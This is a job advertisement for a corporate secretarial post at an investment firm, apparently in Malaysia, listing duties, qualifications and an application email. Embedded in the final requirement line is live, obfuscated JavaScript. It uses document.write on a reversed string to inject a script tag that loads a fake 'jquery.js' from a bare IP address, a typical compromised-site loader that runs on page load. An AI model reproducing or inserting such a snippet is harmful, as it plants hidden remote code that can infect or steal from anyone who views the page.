Industry : Investment
• Assist in preparation of circular resolutions, statutory documents & minutes, board papers, annual reports, Bursa announcements etc.
• Compliance with regulatory requirements for listed company and private subsidiaries.
• Ensure companies’ statutory records are in order and up-to-date.
• Assist in organising, coordinating and compiling meeting papers for all board meetings, AGMs & EGMs and drafting of minutes thereafter.
• Assist in discharging company secretarial duties and other general and administrative duties assigned by superior from time to time.
• ICSA qualification.
• 4 to 6 years of corporate secretarial work experience, exposure in public listed company will be an added advantage
• Familiar with Companies Act 2016, Listing Requirements of Bursa Malaysia Securities Berhad, Malaysian Code on Corporate Governance and other relevant statutory and regulatory requirements
• Proficient in written and spoken English
• Good communication and interpersonal skills
• Able to work independently with minimum supervision and willing to learn
• Positive working attitude, self-motivated, meticulous, strong sense of responsibility and able to meet deadlines document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))
To apply for this job email your details to email@example.com